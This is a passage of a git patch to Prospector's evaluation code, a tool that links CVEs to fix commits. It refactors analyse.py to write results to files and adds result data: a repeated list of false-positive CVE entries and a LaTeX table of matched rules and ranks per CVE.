10.765731614859742 & 976 & 74.56 & 928 & 71.61 \\ %qui era 200 - \begin{tabular}{l} - \quad Commit in reference \\ - \end{tabular} & 0 & 0.0 & 865 & 66.08 & 865 & 66.75 \\ - \begin{tabular}{l} - \quad CVE ID in message \\ - \end{tabular} & 0 & 0.0 & 66 & 5.04 & 32 & 2.47 \\ - \begin{tabular}{l} - \quad CVE ID in Issue \\ - \end{tabular} & 0 & 0.0 & 4 & 0.31 & 1 & 0.08 \\ - \begin{tabular}{l} - \quad Cross Reference \\ - \end{tabular} & 19 & 1.4404852160727823 & 41 & 3.13 & 30 & 2.31 \\ - Medium confidence & 5 & 0.37907505686125853 & 97 & 7.41 & 50 & 3.86 \\ - Low confidence & 3 & 0.22744503411675512 & 90 & 6.88 & 45 & 3.47 \\ - Not found (rank $> 10$) & 46 & 3.4874905231235784 & 35 & 2.67 & 27 & 2.08 \\ - Not reported & 9 & 0.6823351023502654 & 97 & 7.41 & 232 & 17.90 \\ - False Positive & 0 & 0.0 & 14 & 1.07 & 14 & 1.08 \\ - \textbf{Total} & \textbf{1315} & & \textbf{1309} & & \textbf{1296} & - \end{tabular} - \caption{Summary of execution results (MVI=manually-supplied version intervals; AVI=automatically-determined version intervals; NVI=no version intervals supplied)} - \label{tab:tracer_dataset_results} -\end{table} \ No newline at end of file From 47112190770fb40a4f2238133d25cc8d47ac2d8a Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 19 Jul 2024 13:44:31 +0000 Subject: [PATCH 045/130] puts matteo's code into functions and writes results to files instead of console --- prospector/evaluation/analyse.py | 243 +-- .../evaluation/data/results/false_postive.txt | 27 + .../evaluation/data/results/matched_rules.tex | 1470 +++++++++++++++++ .../data/results/plots/project-kb.png | Bin 0 -> 159194 bytes .../results/summary_execution_results.tex | 28 + prospector/evaluation/run_multiple.py | 4 +- prospector/evaluation/save_results.py | 12 +- 7 files changed, 1610 insertions(+), 174 deletions(-) create mode 100644 prospector/evaluation/data/results/false_postive.txt create mode 100644 prospector/evaluation/data/results/matched_rules.tex create mode 100644 prospector/evaluation/data/results/plots/project-kb.png create mode 100644 prospector/evaluation/data/results/summary_execution_results.tex diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 5777e6dbb..25c3365e5 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -16,7 +16,9 @@ ANALYSIS_RESULTS_PATH, build_table_row, ) -from evaluation.save_results import update_latex_table +from evaluation.save_results import ( + update_summary_execution_table, +) from evaluation.utils import load_dataset @@ -92,23 +94,13 @@ def analyze_results_rules(dataset_path: str): def analyze_prospector(filename: str): # noqa: C901 """Analyses Prospector's reports.""" - # delete_missing_git(dataset_path) - # return [] + file = INPUT_DATA_PATH + filename + ".csv" dataset = load_dataset(file) - # res_ts = temp_load_reservation_dates(dataset_path[:-4] + "_timestamps.csv") missing = [] skipped = 0 - # timestamps = { - # "COMMIT_IN_REFERENCE": list(), - # "CVE_ID_IN_MESSAGE": list(), - # "CVE_ID_IN_LINKED_ISSUE": list(), - # "CROSS_REFERENCE": list(), - # "medium_confidence": list(), - # "low_confidence": list(), - # } - yearly_timestamps = {} + results = { "COMMIT_IN_REFERENCE": set(), "CVE_ID_IN_MESSAGE": set(), @@ -122,7 +114,6 @@ def analyze_prospector(filename: str): # noqa: C901 "real_false_positive": set(), } rulescount = defaultdict(lambda: 0) - # references = list() # For each CSV in the input dataset, check its report for itm in dataset: @@ -138,148 +129,106 @@ def analyze_prospector(filename: str): # noqa: C901 ) = check_report( PROSPECTOR_REPORT_PATH + filename, itm[0], itm[4] ) # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS + + results, rulescount, skipped = write_matched_rules( + results, rulescount, skipped, itm, is_fix, has_certainty, commit_id, exists, position, ranks, rules + ) + except FileNotFoundError: print(f"No report for {itm[0]}") continue - # year = itm[0].split("-")[1] - # if is_fix and timestamp is not None: - # res_timestamp = get_reservation_date(itm[0]) - # if res_timestamp is not None: - # ts = timestamp - res_timestamp - # # if int(ts / 86400) > -900: - # year = itm[0].split("-")[1] - # if year not in timestamps: - # timestamps[year] = [] - # timestamps[year].append(int(ts / 86400)) - # # ts_analsis.append(int(ts / 86400)) - # else: - # print(f"Missing reservation date for {itm[0]}") - # time.sleep(0.05) - # if timestamp: - - # # adv_ts = res_ts.get(itm[0]) - # timestamp = adv_ts - timestamp - # yearly_timestamps.setdefault(year, list()) - # yearly_timestamps[year].append(int(timestamp / 86400)) - # timestamp = abs(timestamp) - - # if is_fix and position < 10: - # rules, _, _, _ = check_report_get_rules(filename[:-4], itm[0], itm[4]) - # print(itm[0], rules) - # else: - # continue - # rules, _, _, _ = check_report_get_rules(filename[:-4], itm[0], itm[4]) - # for rule in rules: - # rulescount[rule] += 1 - # continue + print("Saved results to matched_rules.tex") + + # print( + # ",".join( + # results["not_reported"] + # | results["not_found"] + # | results["false_positive"] + # | results["low_confidence"] + # | results["medium_confidence"] + # | results["CVE_ID_IN_LINKED_ISSUE"] + # | results["CROSS_REFERENCE"] + # | results["CVE_ID_IN_MESSAGE"] + # ) + # ) + + total = len(dataset) - skipped + rulescount = dict(sorted(rulescount.items())) + + make_rules_plot(rulescount) + + + # Save the results to the Latex table + table_data = [] + for key, value in results.items(): + # print(f"{key}: {len(value)} ({(len(value)/1315)*100:.2f}%)") # Sanity Check + table_data.append([len(value), len(value) / len(dataset) * 100]) + + update_summary_execution_table( + "MVI", + table_data, + f"{ANALYSIS_RESULTS_PATH}summary_execution_results.tex", + ) + + total_check = sum([len(x) for x in results.values()]) + print(f"\nAnalysed {total_check} reports") # Sanity Check + + if total_check != total: + print("ERROR: Some CVEs are missing") + + return missing + + +def write_matched_rules( + results, rulescount, skipped, itm, is_fix, has_certainty, commit_id, exists, position, ranks, rules +): + with open(ANALYSIS_RESULTS_PATH + 'matched_rules.tex', 'a+') as f: if is_fix and has_certainty: # and 0 <= position < 10: - print( - itm[0], - "&", - " & ".join(build_table_row(rules)), - "&", - " & ".join([str(x) for x in ranks]).replace("-1", ""), - "\\\\ \\midrule", - ) + f.write(f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n") + results[has_certainty].add(itm[0]) - # if "COMMIT_IN_REFERENCE" in has_certainty and all( - # rule != "COMMIT_IN_REFERENCE" - # for rule in has_certainty - # if rule != "COMMIT_IN_REFERENCE" - # ): - # with open("only_commit_in_reference2.csv", "a", newline="") as file: - # writer = csv.writer(file) - # writer.writerow( - # [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] - # ) - # elif all(rule != "COMMIT_IN_REFERENCE" for rule in has_certainty): - # with open("only_other_strong_rules.csv", "a", newline="") as file: - # writer = csv.writer(file) - # writer.writerow( - # [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] - # ) + for rule in rules: rulescount[rule] += 1 - # print(f"{filename[:-4]}/{itm[0]}.json") - # print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") - # print(f"{filename[:-4]}/{itm[0]}.json") - # timestamps["false_positive"].append(timestamp) - # elif is_fix and has_certainty and position > 0: - # results["real_false_positive"].add(itm[0]) - # if int(timestamp / 86400) < 731: - # timestamps[has_certainty].append(int(timestamp / 86400)) + elif is_fix and not has_certainty and position == 0: - print( - itm[0], - "&", - " & ".join(build_table_row(rules)), - "&", - " & ".join([str(x) for x in ranks]).replace("-1", ""), - "\\\\ \\midrule", - ) + f.write(f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n") results["medium_confidence"].add(itm[0]) for rule in rules: rulescount[rule] += 1 - # print(itm[0] + " - " + str(position + 1)) - # if int(timestamp / 86400) < 731: - # timestamps["medium_confidence"].append(int(timestamp / 86400)) elif is_fix and not has_certainty and 0 < position < 10: results["low_confidence"].add(itm[0]) - print( - itm[0], - "&", - " & ".join(build_table_row(rules)), - "&", - " & ".join([str(x) for x in ranks]).replace("-1", ""), - "\\\\ \\midrule", - ) + f.write(f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n") + for rule in rules: rulescount[rule] += 1 - # print(itm[0] + " - " + str(position + 1)) - # print( - # f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]} pos:{position}" - # ) - # if int(timestamp / 86400) < 731: - # timestamps["low_confidence"].append(int(timestamp / 86400)) - # print(itm[0], position + 1) + elif is_fix and not has_certainty and position >= 10: results["not_found"].add(itm[0]) for rule in rules: rulescount[rule] += 1 - # timestamps["not_found"].append(int(timestamp / 86400)) - # print(itm[0], position + 1) - # print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + elif not is_fix and has_certainty: results["false_positive"].add(itm[0]) - with open("false_postive", "a") as file: + with open(f"{ANALYSIS_RESULTS_PATH}false_postive.txt", "a") as file: writer = csv.writer(file) writer.writerow( [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] ) - print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + elif not is_fix and not has_certainty and commit_id and position < 0: results["not_reported"].add(itm[0]) - print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + # print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") + elif not is_fix and not exists and position < 0: skipped += 1 - print( - ",".join( - results["not_reported"] - | results["not_found"] - | results["false_positive"] - | results["low_confidence"] - | results["medium_confidence"] - | results["CVE_ID_IN_LINKED_ISSUE"] - | results["CROSS_REFERENCE"] - | results["CVE_ID_IN_MESSAGE"] - ) - ) - print("I'm here") - total = len(dataset) - skipped - rulescount = dict(sorted(rulescount.items())) + return results, rulescount, skipped + + +def make_rules_plot(rulescount): plt.rcParams["figure.autolayout"] = True plt.rcParams["savefig.dpi"] = 300 sns.set_style("whitegrid") @@ -301,8 +250,10 @@ def analyze_prospector(filename: str): # noqa: C901 ss = sns.barplot( x=list(rulescount.keys()), y=list(rulescount.values()), + hue=list(rulescount.keys()), palette=colors, width=0.6, + legend=False ) plt.xticks(rotation="vertical") # ss.set_xscale("log", base=2) @@ -312,48 +263,10 @@ def analyze_prospector(filename: str): # noqa: C901 # ss.set_xticks(range(0, 800, 100)) ss.tick_params(axis="x", labelsize=8) # plt.show() - plt.savefig("project-kb.png") - - for rule, count in rulescount.items(): - print(f"{rule}: {count}") - # missing_lookup_git(missing) - - # print(YEAR) - print() - total_check = sum([len(x) for x in results.values()]) - print(total_check) - # total_year = sum([len([x for x in y if YEAR in x]) for y in results.values()]) - table_data = [] - for key, value in results.items(): - # print(f"{key}: {len(value)} ({(len(value)/1315)*100:.2f}%)") # Sanity Check - table_data.append([len(value), len(value) / len(dataset) * 100]) - - update_latex_table("MVI", table_data, f"{ANALYSIS_RESULTS_PATH}table.tex") - - # total_check += len(value) - yearly_timestamps = { - k: v for k, v in yearly_timestamps.items() if len(v) > 30 - } - # df = pd.DataFrame(dict([(k, pd.Series(v)) for k, v in timestamps.items()])) - - # ax = sns.violinplot(df, inner="box") - # plt.ylabel("Days") - # plt.show() - - # for key, value in timestamps.items(): - # print( - # f"{key}: mean={int(statistics.mean(value))} stdDev={int(statistics.stdev(value))}" - # ) - - # df = pd.DataFrame.from_dict(timestamps, orient="index") - - # sns.set(style="whitegrid") - # sns.violinplot(data=df) + plt.savefig(f"{ANALYSIS_RESULTS_PATH}plots/project-kb.png") - if total_check != total: - print("ERROR: Some CVEs are missing") - - return missing + # for rule, count in rulescount.items(): + # print(f"{rule}: {count}") # Sanity Check def sum_relevances(list_of_rules): diff --git a/prospector/evaluation/data/results/false_postive.txt b/prospector/evaluation/data/results/false_postive.txt new file mode 100644 index 000000000..acb7e4238 --- /dev/null +++ b/prospector/evaluation/data/results/false_postive.txt @@ -0,0 +1,27 @@ +"CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;8f702469cbf4c451b6dea349290bc4af0f6f76c7,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e;" +CVE-2012-6708;https://github.com/jquery/jquery;None:None;False;05531fc4080ae24070930d15ae0cea7ae056457d; +CVE-2014-0086;https://github.com/richfaces4/core;None:None;False;71687cef6a83f4f9b4430648e4bf06bb7653434b; +"CVE-2014-4172;https://github.com/apereo/java-cas-client;None:None;False;ab6cbdc3daa451b4fef89c0bd0f4e6568f3aa9ef,9de2be91a2ed4f013900cb1facd4036c2f34d051,ae37092100c8eaec610dab6d83e5e05a8ee58814;" +"CVE-2015-0286;https://github.com/openssl/openssl;None:None;False;e677e8d13595f7b3287f8feef7676feb301b0e8a,c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1,02758836731658381580e282ff403ba07d87b2f8,497d0b00dca876beb6c81f2ea6d7160897434c2e,c982285ab63adeb473197d54d246d120bf60778b; identified more twins" +"CVE-2015-0290;https://github.com/openssl/openssl;None:None;False;1d2a18dc5a3b3363e17db5af8b6b0273856ac077,77c77f0a1b9f15b869ca3342186dfbedd1119d0e;" +CVE-2015-3996;https://github.com/AFNetworking/AFNetworking;None:None;False;3e631b203dd95bb82dfbcc2c47a2d84b59d1eeb4; +CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e5967; +CVE-2015-9241;https://github.com/hapijs/hapi;None:None;False;aab2496e930dce5ee1ab28eecec94e0e45f03580; +"CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;8f702469cbf4c451b6dea349290bc4af0f6f76c7,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e;" +CVE-2012-6708;https://github.com/jquery/jquery;None:None;False;05531fc4080ae24070930d15ae0cea7ae056457d; +CVE-2014-0086;https://github.com/richfaces4/core;None:None;False;71687cef6a83f4f9b4430648e4bf06bb7653434b; +"CVE-2014-4172;https://github.com/apereo/java-cas-client;None:None;False;ab6cbdc3daa451b4fef89c0bd0f4e6568f3aa9ef,9de2be91a2ed4f013900cb1facd4036c2f34d051,ae37092100c8eaec610dab6d83e5e05a8ee58814;" +"CVE-2015-0286;https://github.com/openssl/openssl;None:None;False;e677e8d13595f7b3287f8feef7676feb301b0e8a,c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1,02758836731658381580e282ff403ba07d87b2f8,497d0b00dca876beb6c81f2ea6d7160897434c2e,c982285ab63adeb473197d54d246d120bf60778b; identified more twins" +"CVE-2015-0290;https://github.com/openssl/openssl;None:None;False;1d2a18dc5a3b3363e17db5af8b6b0273856ac077,77c77f0a1b9f15b869ca3342186dfbedd1119d0e;" +CVE-2015-3996;https://github.com/AFNetworking/AFNetworking;None:None;False;3e631b203dd95bb82dfbcc2c47a2d84b59d1eeb4; +CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e5967; +CVE-2015-9241;https://github.com/hapijs/hapi;None:None;False;aab2496e930dce5ee1ab28eecec94e0e45f03580; +"CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;8f702469cbf4c451b6dea349290bc4af0f6f76c7,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e;" +CVE-2012-6708;https://github.com/jquery/jquery;None:None;False;05531fc4080ae24070930d15ae0cea7ae056457d; +CVE-2014-0086;https://github.com/richfaces4/core;None:None;False;71687cef6a83f4f9b4430648e4bf06bb7653434b; +"CVE-2014-4172;https://github.com/apereo/java-cas-client;None:None;False;ab6cbdc3daa451b4fef89c0bd0f4e6568f3aa9ef,9de2be91a2ed4f013900cb1facd4036c2f34d051,ae37092100c8eaec610dab6d83e5e05a8ee58814;" +"CVE-2015-0286;https://github.com/openssl/openssl;None:None;False;e677e8d13595f7b3287f8feef7676feb301b0e8a,c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1,02758836731658381580e282ff403ba07d87b2f8,497d0b00dca876beb6c81f2ea6d7160897434c2e,c982285ab63adeb473197d54d246d120bf60778b; identified more twins" +"CVE-2015-0290;https://github.com/openssl/openssl;None:None;False;1d2a18dc5a3b3363e17db5af8b6b0273856ac077,77c77f0a1b9f15b869ca3342186dfbedd1119d0e;" +CVE-2015-3996;https://github.com/AFNetworking/AFNetworking;None:None;False;3e631b203dd95bb82dfbcc2c47a2d84b59d1eeb4; +CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e5967; +CVE-2015-9241;https://github.com/hapijs/hapi;None:None;False;aab2496e930dce5ee1ab28eecec94e0e45f03580; diff --git a/prospector/evaluation/data/results/matched_rules.tex b/prospector/evaluation/data/results/matched_rules.tex new file mode 100644 index 000000000..3bba5f110 --- /dev/null +++ b/prospector/evaluation/data/results/matched_rules.tex @@ -0,0 +1,1470 @@ +CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule +CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule +CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule +CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule +CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule +CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule +CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule +CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule +CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule +CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule +CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule +CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule +CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule +CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule +CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule +CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule +CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule +CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule +CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule +CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule +CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule +CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule +CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule +CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule +CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule +CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule +CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & 